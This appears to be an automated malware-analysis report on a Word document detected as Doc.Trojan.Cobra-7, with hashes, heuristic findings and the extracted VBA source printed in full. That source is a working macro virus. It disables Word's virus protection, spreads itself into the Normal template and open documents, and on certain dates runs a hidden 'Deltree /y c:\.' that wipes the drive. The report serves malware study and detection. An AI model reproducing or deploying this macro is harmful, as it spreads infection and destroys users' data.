Office (OLE) malware analysis — malicious · aadfe6a2bc2e97a4

MALICIOUS

Office (OLE)

48.0 KB Created: 2000-04-12 23:43:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 8009374f839fa514a97b96ecb45dba45 SHA-1: 3a5f9bf85e3d40be2cc61d20459a85f3670b13f7 SHA-256: aadfe6a2bc2e97a499c6f30e1a0543f9ed3a0c9cdccaf1a265edbae3bd7120d9

340 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains critical heuristics indicating the presence of VBA macros with AutoOpen and Auto_Close functions, and a Shell() call. The VBA script explicitly attempts to delete other macros from the Normal template and the active document, and then copies the 'Cobra' macro to both locations. This behavior suggests an attempt to establish persistence and potentially hide its presence by manipulating macro storage. The ClamAV detection of 'Doc.Trojan.Cobra-7' further supports a malicious classification.

Heuristics 7

ClamAV: Doc.Trojan.Cobra-7 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Cobra-7
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11074 bytes
SHA-256: `a750c52ed204900c640035e65cb4c3aec1945ce259fca38eed0ae0d4f99998e9`
Detection ClamAV: Win.Trojan.DelTree-10 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Cobra" 'Cobra Version 1.0C Sub AutoOpen() Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False Call DelMac Call TempCopy Call ADocCopy Call DelCDrive End Sub Sub DelMac() On Error Resume Next Set NTmp = NormalTemplate Set ADoc = ActiveDocument For i = 1 To NTmp.VBProject.VBComponents.Count nm = NTmp.VBProject.VBComponents(i).Name If (nm <> "Cobra") And (nm <> "ThisDocument") Then Application.OrganizerDelete Source:=NTmp.FullName, _ Name:=nm, Object:=wdOrganizerObjectProjectItems End If Next i For i = 1 To ADoc.VBProject.VBComponents.Count nm = ADoc.VBProject.VBComponents(i).Name If (nm <> "ThisDocument") And (nm <> "Cobra") And _ (nm <> "Reference to Normal") Then Application.OrganizerDelete Source:=ADoc.FullName, _ Name:=nm, Object:=wdOrganizerObjectProjectItems End If Next i End Sub Private Sub TempCopy() On Error Resume Next Application.OrganizerCopy Source:=ActiveDocument.FullName, _ Destination:=NormalTemplate.FullName, Name:="Cobra", _ Object:=wdOrganizerObjectProjectItems Templates(NormalTemplate.FullName).Save End Sub Private Sub ADocCopy() On Error Resume Next Application.OrganizerCopy Source:=NormalTemplate.FullName, _ Destination:=ActiveDocument.FullName, Name:="Cobra", _ Object:=wdOrganizerObjectProjectItems End Sub Private Sub DelCDrive() On Error Resume Next Dim DelOk As Boolean For i = 1 To 10 If Day(Now) = i And Month(Now) = i Then If i <= 4 Then If Left(Application.UserName, 1) <= Chr(100) Then DelOk = True End If End If If i > 4 And i <= 8 Then If Left(Application.UserName, 1) > Chr(100) _ And Left(Application.UserName, 1) <= Chr(200) Then DelOk = True End If End If If i > 8 And i <= 12 Then If Left(Application.UserName, 1) > Chr(200) _ And Left(Application.UserName, 1) <= Chr(255) Then DelOk = True End If End If End If Next If DelOk = True Then Call DelDir End If End Sub Sub AutoClose() On Error Resume Next TempCopy ADocCopy If ActiveDocument.Saved = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If End Sub Sub DelDir() On Error Resume Next Dim MP, MN MP = "c:\" MN = Dir(MP, vbDirectory) Do While MN <> "" If MN <> "." And MN <> ".." Then If (GetAttr(MP & MN) And vbDirectory) = vbDirectory Then If UCase(Left(MN, 1)) = UCase(Left(Application.UserName, 1)) Then Shell "Deltree /y c:\.", vbHide End If End If End If MN = Dir Loop End Sub Sub FileNew() On Error Resume Next Call DelMac Call TempCopy Call ADocCopy Dialogs(wdDialogFileNew).Show End Sub Sub FileExit() On Error Resume Next Call DelMac Call TempCopy Call ADocCopy End Sub ' Processing file: /opt/analyzer/scan_staging/70065fb4e9984ec19c896a70cd677890.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1182 bytes ' Macros/VBA/Cobra - 8273 bytes ' Line #0: ' QuoteRem 0x0000 0x0012 "Cobra Version 1.0C" ' Line #1: ' FuncDefn (Sub AutoOpen()) ' Line #2: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #3: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #4: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #5: ' ArgsCall (Call) DelMac 0x0000 ' Line #6: ' ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.